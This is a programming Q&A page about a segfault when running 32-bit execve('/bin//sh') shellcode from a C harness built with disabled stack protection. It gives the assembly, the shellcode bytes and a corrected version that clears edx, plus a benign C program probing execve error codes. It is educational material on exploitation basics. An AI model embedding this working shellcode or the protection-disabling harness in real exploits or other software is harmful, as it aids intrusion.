Executing shellcode segmentation fault


Problem description


I've compiled a basic exploit (basically, the source in C doesn't exploit anything, it simply executes the opcodes which execute Bash). The problem is when I execute the binary: "Segmentation fault".

Here is what I've done:

executeBash.asm (NASM)

section .text
global _start
_start:
xor EAX, EAX           ; EAX = 0
push EAX               ; "\0\0\0\0"
push DWORD 0x68732F2F  ; "//sh"
push DWORD 0x6E69622F  ; "/bin"
mov EBX, ESP           ; arg1 = "/bin//sh\0"
push EAX               ; NULL -> args[1]
push EBX               ; "/bin//sh\0" -> args[0]
mov ECX, ESP           ; arg2 = args[]
mov AL, 0x0B           ; syscall 11
int 0x80               ; execve("/bin//sh", args["/bin//sh", NULL], NULL)

In the terminal:

prompt$ nasm -f elf32 executeBash.asm
prompt$ ld -m elf_i386 executeBash.o -o executeBash
prompt$ objdump -M intel,i386 -d executeBash

executeBash:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:   31 c0                   xor    eax,eax
 8048062:   50                      push   eax
 8048063:   68 2f 2f 73 68          push   0x68732f2f
 8048068:   68 2f 62 69 6e          push   0x6e69622f
 804806d:   89 e3                   mov    ebx,esp
 804806f:   50                      push   eax
 8048070:   53                      push   ebx
 8048071:   89 e1                   mov    ecx,esp
 8048073:   b0 0b                   mov    al,0xb
 8048075:   cd 80                   int    0x80
prompt$ # "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
prompt$ ./executeBash
$ exit
prompt$ 

The exploit in ASM runs perfectly.

exploitBash.c

int main(void)
{
    char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                       "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
    void (*fp)(void);
    /* jump into the buffer; the stack is executable thanks to -z execstack */
    fp = (void (*)(void))shellcode;
    fp();
    return 0;
}

prompt$ gcc -m32 -fno-stack-protector -z execstack exploitBash.c -o exploitBash
prompt$ ./exploitBash
Segmentation fault

Solution

You forgot to set up edx so it contains whatever the C code last used it for and that's unlikely to be a valid environment pointer. In the standalone code, edx happened to be zero due to the initial startup state of the program. If you use strace you can see that the execve returns with -EFAULT and then execution continues past your code into garbage which then truly segfaults. You can fix the shellcode for example like this:

char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                   "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\x31\xd2\xcd\x80";

(I included a xor edx, edx before the int 0x80.)
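As an added illustration of the diagnosis above (this is example code written for this page, not part of the original question or answer), the following C program calls execve(2) from an ordinary process with the same argv the shellcode builds but a deliberately invalid envp pointer, which is what a stale edx amounts to. The kernel validates the argv and envp pointers before it replaces the process image, so the call returns -1 with errno set to EFAULT and the caller simply continues, which is the line strace shows. A second call with valid pointers but a path that does not exist fails with ENOENT instead, so the two failure modes can be told apart. The function names, the bogus pointer value 0x1 and the nonexistent path are this example's own.

```c
/* Added example: probe the execve(2) pointer validation that the answer
 * relies on. Nothing here is taken from the original page's code. */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Call execve() and return the errno it set. execve only returns on
 * failure, so reaching the return statement means the exec did not happen
 * and the process image is untouched. */
static int probe_execve(const char *path, char *const argv[], char *const envp[])
{
    errno = 0;
    execve(path, argv, envp);
    return errno;
}

/* Same path and argv the shellcode sets up in ebx/ecx, but envp is a
 * constructed garbage pointer standing in for an uninitialised edx. */
int envp_garbage_gives_efault(void)
{
    char *const argv[] = { "/bin//sh", NULL };
    char *const *bad_envp = (char *const *)0x1;   /* constructed invalid pointer */
    return probe_execve("/bin//sh", argv, bad_envp);
}

/* For contrast: NULL envp is accepted by Linux (treated as an empty
 * environment), so with valid pointers the only thing that can fail is the
 * path lookup, reported as ENOENT rather than EFAULT. */
int good_pointers_bad_path_gives_enoent(void)
{
    char *const argv[] = { "/bin//sh", NULL };
    return probe_execve("/nonexistent-example-path/sh", argv, NULL);
}

int main(void)
{
    int e = envp_garbage_gives_efault();
    printf("execve with garbage envp: errno=%d (%s)\n", e, strerror(e));
    e = good_pointers_bad_path_gives_enoent();
    printf("execve with bad path:     errno=%d (%s)\n", e, strerror(e));
    return 0;
}
```

Build it with plain `gcc` (no `-m32` or `-z execstack` needed): the pointer checks are part of the execve contract and behave the same whether the call arrives through `int 0x80` or the 64-bit `syscall` instruction. Running it under `strace -e execve` prints the same `-1 EFAULT (Bad address)` result the answer describes for the shellcode.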
